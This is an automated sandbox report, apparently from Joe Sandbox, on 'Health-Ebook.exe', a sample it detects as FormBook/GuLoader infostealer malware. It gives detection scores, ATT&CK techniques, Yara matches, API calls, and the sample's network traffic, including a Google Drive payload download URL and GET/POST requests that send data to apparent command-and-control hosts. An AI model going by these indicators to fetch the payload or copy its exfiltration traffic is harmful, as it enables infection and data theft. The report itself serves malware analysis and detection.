
Analysis Report Health-Ebook.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 218399
Start date: 27.03.2020
Start time: 01:03:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 59s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Health-Ebook.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@15/8@9/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 18.3% (good quality ratio 15.7%)
  • Quality average: 69.5%
  • Quality standard deviation: 34.2%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Excluded processes from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 216.58.215.238, 2.18.68.82, 172.217.168.46
  • Excluded domains from analysis (whitelisted): docs.google.com, fs.microsoft.com, drive.google.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: FormBook GuLoader
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation is likely to extend behavior
Sample tries to load a library which is not present or installed on the analysis machine; adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior
Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Execution through Module Load1 | Registry Run Keys / Startup Folder1 | Process Injection512 | Disabling Security Tools1 | Credential Dumping1 | Security Software Discovery221 | Remote File Copy3 | Data from Local System1 | Data Encrypted1 | Remote File Copy3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Graphical User Interface1 | Port Monitors | Accessibility Features | Software Packing1 | Input Capture1 | File and Directory Discovery2 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Windows Management Instrumentation | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information1 | Input Capture | System Information Discovery13 | Windows Remote Management | Input Capture1 | Automated Exfiltration | Standard Non-Application Layer Protocol4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Scheduled Task | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information3 | Credentials in Files | Virtualization/Sandbox Evasion12 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol15 | SIM Card Swap |  | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading1 | Account Manipulation | Process Discovery2 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Virtualization/Sandbox Evasion12 | Brute Force | Remote System Discovery1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service |  | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection512 | Two-Factor Authentication Interception | Network Sniffing | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | DLL Side-Loading1 | Bash History | Network Service Scanning | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

Signature Overview



AV Detection:

Multi AV Scanner detection for submitted file
Source: Health-Ebook.exe | Virustotal: Detection: 63%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Health-Ebook.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 2.0.Health-Ebook.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.Health-Ebook.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 15.0.h8tczuli.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 14.2.h8tczuli.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 14.0.h8tczuli.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 4x nop then pop edi | 2_2_000ABB6F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 4x nop then pop edi | 15_2_0006BB6F

Networking:

HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20 HTTP/1.1 | Host: www.michalshahar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=3PkPLEV8daGFL4/3pxhg1tKv6aVypEBkpsp65f+Yzy4XBcektFNWUD7dAcSGsTOSbbgw HTTP/1.1 | Host: www.kbasherphotography.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 192.0.78.24
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | ASN Name: AUTOMATTIC-AutomatticIncUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST /w0k/ HTTP/1.1 | Host: www.kbasherphotography.com | Connection: close | Content-Length: 143114 | Cache-Control: no-cache | Origin: http://www.kbasherphotography.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.kbasherphotography.com/w0k/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: (hex dump of the form body omitted)
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20 HTTP/1.1 | Host: www.michalshahar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=3PkPLEV8daGFL4/3pxhg1tKv6aVypEBkpsp65f+Yzy4XBcektFNWUD7dAcSGsTOSbbgw HTTP/1.1 | Host: www.kbasherphotography.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: doc-0s-5o-docs.googleusercontent.com
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /w0k/ HTTP/1.1 | Host: www.kbasherphotography.com | Connection: close | Content-Length: 143114 | Cache-Control: no-cache | Origin: http://www.kbasherphotography.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.kbasherphotography.com/w0k/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: (hex dump of the form body omitted)
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 27 Mar 2020 00:04:44 GMT | Content-Type: text/html | Content-Length: 162 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Urls found in memory or binary data
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Health-Ebook.exe, 00000000.00000002.768571931.0000000002040000.00000040.00000001.sdmp, Health-Ebook.exe, 00000002.00000002.820734895.00000000004F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000E.00000002.1066471434.00000000006F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000F.00000002.1088990486.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: http://myurl/myfile.bin
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.795704817.0000000007B92000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Health-Ebook.exe, 00000000.00000002.768571931.0000000002040000.00000040.00000001.sdmp, Health-Ebook.exe, 00000002.00000002.820734895.00000000004F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000E.00000002.1066471434.00000000006F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000F.00000002.1088990486.00000000004F0000.00000040.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1gFbYNKbyWP39HA-ViQO1paj7YMBxdq0p
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: h8tczuli.exe, 0000000E.00000002.1066525911.00000000007D0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_02044A7B NtResumeThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_0204008A NtSetInformationThread, TerminateProcess
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_0204472A NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_020417C8 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_02044E98 NtResumeThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A750 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A700 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A720 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A610 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A6A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A540 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A560 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A5F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A410 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A480 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A4A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A360 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A3E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A240 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A2D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A710 NtQuerySection
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A780 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A650 NtQueueApcThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A6D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54BD40 NtSuspendThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A520 NtEnumerateKey
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A5A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A470 NtSetInformationFile
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54B470 NtOpenThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A460 NtOpenProcess
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54B410 NtOpenProcessToken
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A430 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54ACE0 NtCreateMutant
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A350 NtQueryValueKey
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A370 NtQueryInformationProcess
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A310 NtEnumerateValueKey
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A3D0 NtCreateKey
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A260 NtWriteFile
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54BA30 NtSetContextThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A220 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A2F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54A800 NtSetValueKey
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F54B0B0 NtGetContextThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F008A NtSetInformationThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F4A7B NtSetInformationThread
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F1651 RtlAddVectoredExceptionHandler, NtProtectVirtualMemory, LdrInitializeThunk, NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F162A CreateThread, TerminateThread, LdrInitializeThunk, NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F472A NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F1FCC Sleep, NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F4E98 NtSetInformationThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F008A NtSetInformationThread, TerminateProcess
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F4A7B NtResumeThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F472A NtProtectVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F17C8 NtWriteVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F4E98 NtResumeThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A750 NtCreateFile, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A700 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A720 NtResumeThread, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A610 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A6A0 NtCreateSection, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A540 NtDelayExecution, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A560 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A5F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A410 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A480 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A4A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A360 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A3E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A240 NtReadFile, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A2D0 NtClose, LdrInitializeThunk
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A710 NtQuerySection
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A780 NtOpenDirectoryObject
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A650 NtQueueApcThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A6D0 NtCreateProcessEx
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40BD40 NtSuspendThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A520 NtEnumerateKey
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A5A0 NtWriteVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A460 NtOpenProcess
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A470 NtSetInformationFile
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40B470 NtOpenThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40B410 NtOpenProcessToken
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A430 NtQueryVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40ACE0 NtCreateMutant
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A350 NtQueryValueKey
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A370 NtQueryInformationProcess
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A310 NtEnumerateValueKey
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A3D0 NtCreateKey
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A260 NtWriteFile
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A220 NtWaitForSingleObject
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40BA30 NtSetContextThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A2F0 NtQueryInformationFile
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40A800 NtSetValueKey
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F40B0B0 NtGetContextThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_004F008A NtSetInformationThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_004F4A7B NtSetInformationThread
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_004F1651 RtlAddVectoredExceptionHandler, NtProtectVirtualMemory, LdrInitializeThunk, NtProtectVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_004F162A CreateThread, TerminateThread, LdrInitializeThunk, NtProtectVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_004F472A NtProtectVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_004F1FCC Sleep, NtProtectVirtualMemory
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_004F4E98 NtSetInformationThread
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: String function: 1F41DDE8 appears 49 times
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: String function: 1F455110 appears 45 times
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: String function: 1F3CB0E0 appears 176 times
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: String function: 1F595110 appears 40 times
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: String function: 1F50B0E0 appears 176 times
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: String function: 1F55DDE8 appears 49 times
PE file contains strange resources
Source: Health-Ebook.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Health-Ebook.exe, 00000000.00000000.748082142.0000000000413000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCerithiumun.exe vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000002.825855427.000000001F78F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000000.767415352.0000000000413000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCerithiumun.exe vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000002.820644898.00000000000E9000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamenetsh.exej% vs Health-Ebook.exe
